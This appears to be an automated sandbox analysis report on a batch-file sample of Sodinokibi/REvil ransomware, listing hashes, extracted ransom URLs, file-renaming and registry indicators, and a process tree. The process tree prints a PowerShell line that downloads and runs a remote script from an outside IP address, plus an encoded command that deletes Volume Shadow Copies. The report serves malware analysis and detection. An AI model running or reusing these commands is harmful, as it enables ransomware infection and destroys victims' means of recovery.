Analysis
- max time kernel: 34s
- max time network: 37s
- platform: windows7_x64
- resource: win7v200722
- submitted: 15-08-2020 18:10
Static task: static1
Behavioral task: behavioral1
  Sample: 9842da71e658da87f135c517a3f7aba2.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 9842da71e658da87f135c517a3f7aba2.bat
  Resource: win10
General
- Target: 9842da71e658da87f135c517a3f7aba2.bat
- Size: 219B
- MD5: 5acf7c3e584d3bebc79930940e9cbb00
- SHA1: 37f0819fd07164c0b419c2947e43fd06a07fc83a
- SHA256: 62059583f678cc07ba6d42a856ff79d0747e13f0d1b2b6e2c75ec316bf47d686
- SHA512: c6cdf567391326815253277475a921f2f454c434324592a63c91a9e08818806e223dcbc41e345debf124611a9df1474829bdbd11057e6120038292774ee5b5b8
Malware Config
Extracted
- URL: http://185.103.242.78/pastes/9842da71e658da87f135c517a3f7aba2
Extracted
- Path: C:\h29785m8-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/322534A63754DCD9
  - http://decryptor.cc/322534A63754DCD9
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (1 IoCs)
  Processes (flow | pid | process):
    3 | 1416 | powershell.exe
- Modifies extensions of user files (2 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (description | ioc | process):
    File renamed | C:\Users\Admin\Pictures\GetUpdate.png => \??\c:\users\admin\pictures\GetUpdate.png.h29785m8 | powershell.exe
    File renamed | C:\Users\Admin\Pictures\HideEdit.png => \??\c:\users\admin\pictures\HideEdit.png.h29785m8 | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes (description | ioc | process):
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\362xmlm6d.bmp" | powershell.exe
- Drops file in Program Files directory (29 IoCs)
  Processes (description | ioc | process):
    File opened for modification | \??\c:\program files\EditUnpublish.cfg | powershell.exe
    File opened for modification | \??\c:\program files\PopAssert.ini | powershell.exe
    File opened for modification | \??\c:\program files\RegisterSelect.AAC | powershell.exe
    File opened for modification | \??\c:\program files\SearchStart.dxf | powershell.exe
    File created | \??\c:\program files\h29785m8-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\CheckpointPush.wax | powershell.exe
    File opened for modification | \??\c:\program files\DisconnectUndo.dotm | powershell.exe
    File opened for modification | \??\c:\program files\EditUnblock.tif | powershell.exe
    File opened for modification | \??\c:\program files\SkipProtect.ini | powershell.exe
    File opened for modification | \??\c:\program files\UnregisterPop.php | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\h29785m8-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\ResolveInvoke.tiff | powershell.exe
    File opened for modification | \??\c:\program files\ShowCompress.wma | powershell.exe
    File opened for modification | \??\c:\program files\UndoGrant.gif | powershell.exe
    File opened for modification | \??\c:\program files\DismountInitialize.wps | powershell.exe
    File opened for modification | \??\c:\program files\ReadEnter.vbe | powershell.exe
    File opened for modification | \??\c:\program files\SplitProtect.mhtml | powershell.exe
    File opened for modification | \??\c:\program files\DenyInstall.easmx | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\h29785m8-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\MoveUnpublish.dot | powershell.exe
    File opened for modification | \??\c:\program files\ReadConvertTo.DVR-MS | powershell.exe
    File opened for modification | \??\c:\program files\UnprotectFind.js | powershell.exe
    File created | \??\c:\program files\microsoft sql server compact edition\v3.5\h29785m8-readme.txt | powershell.exe
    File created | \??\c:\program files (x86)\h29785m8-readme.txt | powershell.exe
    File opened for modification | \??\c:\program files\OutPublish.DVR | powershell.exe
    File opened for modification | \??\c:\program files\SuspendSubmit.mpeg | powershell.exe
    File opened for modification | \??\c:\program files\UnprotectRename.doc | powershell.exe
    File opened for modification | \??\c:\program files\ShowGrant.mp4 | powershell.exe
    File opened for modification | \??\c:\program files\UnlockRestart.otf | powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes (pid | process):
    1416 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid | process):
    1416 | powershell.exe
    1416 | powershell.exe
    1416 | powershell.exe
    1368 | powershell.exe
    1368 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1416 | powershell.exe
    Token: SeDebugPrivilege | 1416 | powershell.exe
    Token: SeDebugPrivilege | 1368 | powershell.exe
    Token: SeBackupPrivilege | 568 | vssvc.exe
    Token: SeRestorePrivilege | 568 | vssvc.exe
    Token: SeAuditPrivilege | 568 | vssvc.exe
    Token: SeTakeOwnershipPrivilege | 1416 | powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (description | pid | process | target process):
    PID 604 wrote to memory of 1416 | 604 | cmd.exe | powershell.exe
    PID 604 wrote to memory of 1416 | 604 | cmd.exe | powershell.exe
    PID 604 wrote to memory of 1416 | 604 | cmd.exe | powershell.exe
    PID 604 wrote to memory of 1416 | 604 | cmd.exe | powershell.exe
    PID 1416 wrote to memory of 1368 | 1416 | powershell.exe | powershell.exe
    PID 1416 wrote to memory of 1368 | 1416 | powershell.exe | powershell.exe
    PID 1416 wrote to memory of 1368 | 1416 | powershell.exe | powershell.exe
    PID 1416 wrote to memory of 1368 | 1416 | powershell.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\9842da71e658da87f135c517a3f7aba2.bat"
  PID: 604
  Signatures:
  - Suspicious use of WriteProcessMemory
  Child process:
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9842da71e658da87f135c517a3f7aba2');Invoke-SBNFPXFVJWUD;Start-Sleep -s 10000"
    PID: 1416
    Signatures:
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Child process:
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is a base64-encoded UTF-16LE string; decoded, it enumerates Win32_ShadowCopy instances through WMI and calls Delete() on each, i.e. it removes Volume Shadow Copies before encryption, a standard ransomware precursor worth alerting on.)
      PID: 1368
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 568
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken